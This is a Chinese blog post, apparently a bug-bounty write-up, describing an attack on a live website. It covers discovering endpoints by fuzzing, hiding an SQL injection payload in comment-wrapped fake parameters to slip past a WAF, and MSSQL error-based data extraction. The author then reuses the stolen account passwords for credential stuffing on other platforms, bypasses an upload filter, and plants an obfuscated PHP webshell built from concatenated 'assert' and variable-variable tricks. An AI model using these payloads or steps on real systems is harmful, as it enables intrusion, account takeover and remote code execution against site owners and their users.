一次挖掘SRC漏洞 - 从0到有

我会带着你远行 2022-10-21 01:29 179阅读 0赞

对一次SRC平台漏洞挖掘，全程文字描述多一点。

测试范围:

XXXXX平台: www.A.com

Xxxxxxx平台: www.B.com

本人信息搜集不是很6，我这里直接测他的某个站的主站。所以我决定一个一个测，防止漏过，很多人一般都是先搜集子域名，因为子域名的防护相对薄弱一点。而且奖金也一样的高。

我就先打开了A.com的主站，先用layer先跑他的子域。在信息搜集中，我先测测A.com。

看看能不能捡个漏。

![图片][f7ae322f63600c8a7b1bd2831ad11341.png]

第一眼就相中了这个搜索框，习惯性先测高危测起，先测SQL注入。在参数 输入1' 发现只返回了1

![图片][7c1a3b886212fb472578199c42ef97f1.png]

发现只返回了1，没有返回1'

那这里SQL注入就不存在， 但是我们可以联想到:

> 1.这个站可能全局过滤单引号?
> 
>     1.1 如果真是这样，我只能找int类型注入;
> 
>     1.2 如果真是这样，这个可以帮我过Waf，利用全局特性过滤。
> 
>     se'l'e'c't=select
> 
> 2.如果不是全局，那我们换个点来测。

然后我就这个搜索框来继续测XSS，发现失败了。他过滤了。

然后从其他点发现，他不是全局过滤单引号的，那我们实行plan B。

测试的时候发现有waf

![图片][8dded83ec543aba72e53e2c77ec26746.png]

毕竟是主站，我们可以看看他是什么样的waf，

> 1.代码waf(对有效参数的参数值进行拦截);
> 
> 2.硬waf(拦截流量).

我输入一个不存在的参数，?x=1 union select

![图片][8dded83ec543aba72e53e2c77ec26746.png]

直接给我拦了。

说明存在Waf拦截的是流量。

那我就先来绕waf，

最后发现这是智能型WAF，他不会管注释里的内容。

![图片][010c7c77ade68907c7425618ce305852.png]

那我的思路就来了，直接给他安排两个虚假的参数a和b

![图片][f02eda3c570874a1023a03aea1956c2d.png]

程序只接收的到id参数。

发现页面显示正常!起送bypass可以用来测试注入，也能用来测XSS，毫无阻拦。

一段操作下来，一个漏洞都没测到。

然后我们开始目录扫描，选择扫描302、403、200这些，我用的BURP，因为怕其他软件的特征被封ip。

一分钟过去后，我们看到了结果。

![图片][458f35e325e7cca1c6b8fca1afb420db.png]

发现扫什么都是302 但是发现了tz这个目录不一样

![图片][44fb46a6f99e7d60c1831805a25d7377.png]

返回的是这个，那这个tz目录绝对有猫腻呀！！

然后我们观察他的url结构，后面都是跟方法名，那我们不扫文件，直接扫方法。

Fuzz一波。

![图片][57ae7421473e02855aee0da38abe2892.png]

啊哈 扫到另一个add

字典呢 这里用的是 https://github.com/TheKingOfDuck/fuzzDicts 下载的

![图片][b648c40346b6ac8677d9c3dc28940f42.png]

返回结果是用户名不能为空，那我们就构造用户名的参数  
Fuzz一波 比如username=1

![图片][82b39af67fa0bb5bc0e3e61a7268f76b.png]

啊哈？有不同的的返回结果了，让我们真实姓名不能为空 继续用&来构造参数

当我输入name=1 它还是提示这个，说明我们参数名不对，那我们百度一下真实姓名的英文 发现是realname 这个参数

![图片][bf67cd7910280a59243687859d4d052a.png]

OK 有了新的返回结果，感觉就像是在猜谜语一样哈哈。

![图片][ae89c324388e00e870802604687f9b06.png]

当我们把身份证的英文字母都填进去的时候 发现答案都不对

这时候我有点丧气了 躺了一会想想 想起以前日站的时候 身份证号参数基本上都是idcard呀 这些

,突然想起来 会不会用的是拼音呢？

然后索性我就用sfz=1 发信还是提示的这个

![图片][6eecbaff3af56f4ce9973a438c75c94a.png]

我们注意到 是4个字 那我改为sfzh=1

![图片][4b7361f1fbcb3e951ac377cd032c464c.png]

然后就返回了这个 说明参数全部猜对了。

![图片][4b7361f1fbcb3e951ac377cd032c464c.png]

返回用户名1 已存在，我脑海中飞速运转。

它为什么知道 用户名已经存在？  
答案一个：他和数据库交互了。

那这里就可能存在SQL注入。

![图片][e2aee7df089cf0e7d53bb1bd0f2b3b6f.png]

一个单引号过去了 果然报错了 然后试着用and 来闭合

发现

![图片][8dded83ec543aba72e53e2c77ec26746.png]

忘记了 有waf 但是我们不是已经过waf了吗

指哪打哪

> a=/\*&username=1' and 1='1&realname=1&sfzh=111'&b=\*/

构造payload

![图片][4393965386913a0d3b984b12e82fd555.png]

1=2 的时候 返回这个

![图片][1beb2982bcace3c521ecc04586c636e2.png]

这不就百分百存在SQL注入吗，然后我绞经脑汁 测不出数据来 不知道他是啥数据库

用sqlmap跑直接给我**IP给封了**

最后 and 1=‘dddd

![图片][6db7f528c24ae17e191c922acd7d3657.png]

刚开始我看到这个 搜索了一波 刚开始以为是mssql 但是没测出来 用了waitfor delay 还报错了

还以为是HQL注入 最后测了 老半天. 去下了个hqlmap但是开始就卡死了

当时我还坚认为是HQL注入 哈哈哈 因为当时我是这么测的

and user=’1 （这是错误的规范哦 因为这里的1 也是字符串 只有int类型 才会出数据）

当时用substring 加上盲猜用户名函数是user 破解出user是dbo

![图片][8638a9a6065283f75e35b13cddf7b36e.png]

我靠？是dbo 那还不是mssql数据库吗

继续测 看到原因了 修改payload

![图片][453489e67438bcf65fe83b88661fee88.png]

可以看到是报错mssql报错注入 可以欢快的出数据啦

**![图片][2703499a8cf4a1019b0c17e4ea4d43a4.png]**

--------------------

**后续**  
一个SQL注入到手，后续测了很多东西,一顿手工操作定位到账号密码

拿到了账号密码去其他平台撞库了。

是一个PHP的站点

进了后台 然后有一处任意文件上传 是有WAF 检测后缀

首先上传个jpg 然后直接抓包改后缀 (是前端认证的话 抓包可以直接绕过)

![图片][dd7db6516607e4ba37b6512db7126b3b.png]

换行直接绕过 发现能上传绕过。

可开心死我了。心想着一处Getshell到手了呀 然后再图片内容后面加上一句话木马

![图片][3cbb15effa42baaacb489bb47b8b72aa.png]

啊哈？go 一直是没反应 说明了他还检测内容. 那我直接把代码内容删了 从<?php 开始测

首先想上传个phpinfo 都被拦截了 那我用短标签试试<?=?>

<?=phpinfo()?>

发现上传成功了 解释一下 这是php的短标签风格 “=”号 这里相当于echo

![图片][b2dc150bbad57f6028cd25b0c1891f37.png]

之后发现是php5.6

那可好绕了 php7.0下面的php都能用assert拼接 他是拦截关键字的

直接$a='a'.'s'.'sert';

最后发现$\_GET\['a'\],$\_PSOT\['b'\].... 这种传参方式被拦截了，

继续 FUZZ 删到 他不拦截为止 删到了$\_GET 他不拦截了 思路来了，那我可以用foreach。

foreach ($_GET as $key=>$value) {
        $$key=$value;
    }

伪全局,最后$key 相当于 $\_GET\['key'\]  
最后直接 $a($key); 原生代码就等于assert($\_GET\['key'\])

然后久违的SHELL 就到手了~

[f7ae322f63600c8a7b1bd2831ad11341.png]: /images/20221021/591dfd2c02cc4a47ae8255701964f2f5.png
[7c1a3b886212fb472578199c42ef97f1.png]: /images/20221021/8539aa777ebe45a1b8894bb3d35ae65f.png
[8dded83ec543aba72e53e2c77ec26746.png]: /images/20221021/8c033af08783495492132566545631d3.png
[010c7c77ade68907c7425618ce305852.png]: /images/20221021/c2ebc7a5031b41689c4fd1ae31879593.png
[f02eda3c570874a1023a03aea1956c2d.png]: /images/20221021/a4e9cbece79b4aa0977867b7ad30e80f.png
[458f35e325e7cca1c6b8fca1afb420db.png]: /images/20221021/42ca5477fed64bcf9a1d3362c862c269.png
[44fb46a6f99e7d60c1831805a25d7377.png]: /images/20221021/c9b0482686714700bd41fb8f58d73502.png
[57ae7421473e02855aee0da38abe2892.png]: /images/20221021/04e4dd23deb6435b8f72c1e4fd758bd9.png
[b648c40346b6ac8677d9c3dc28940f42.png]: /images/20221021/feb41e7392b94168aaad00f3771f772c.png
[82b39af67fa0bb5bc0e3e61a7268f76b.png]: /images/20221021/213c7f129fcb48cf921cf42d8a023845.png
[bf67cd7910280a59243687859d4d052a.png]: /images/20221021/528707cd854e4f34b6faaceb1d6a3c21.png
[ae89c324388e00e870802604687f9b06.png]: /images/20221021/efab39084718467eab1873cb18ad2785.png
[6eecbaff3af56f4ce9973a438c75c94a.png]: /images/20221021/30fbb6e71baf41caa562a74b36885e0a.png
[4b7361f1fbcb3e951ac377cd032c464c.png]: /images/20221021/7f3f50e99e81479199f16af3a45a9ea0.png
[e2aee7df089cf0e7d53bb1bd0f2b3b6f.png]: /images/20221021/7355c711545d43209a9c52ef21e6e8e8.png
[4393965386913a0d3b984b12e82fd555.png]: /images/20221021/a24c44277a3042a1ba1fdf1cc3b6cfdb.png
[1beb2982bcace3c521ecc04586c636e2.png]: /images/20221021/76f8b8c07dad47129082f4d040340772.png
[6db7f528c24ae17e191c922acd7d3657.png]: /images/20221021/80f2e02db6d34c12b374d3c5678da8b8.png
[8638a9a6065283f75e35b13cddf7b36e.png]: /images/20221021/117e7a817c204051babebb44fbfa3984.png
[453489e67438bcf65fe83b88661fee88.png]: /images/20221021/f877b5698a7344069ae0c9c4ae876561.png
[2703499a8cf4a1019b0c17e4ea4d43a4.png]: /images/20221021/7efa21c19f794f928863a37c570f6c52.png
[dd7db6516607e4ba37b6512db7126b3b.png]: /images/20221021/bc91749072364e99a901713f4197d275.png
[3cbb15effa42baaacb489bb47b8b72aa.png]: /images/20221021/527bd4a9c86a45b580aa7318fcaf4b53.png
[b2dc150bbad57f6028cd25b0c1891f37.png]: /images/20221021/16d58e2c8e7643e1b32122cbadf7fc54.png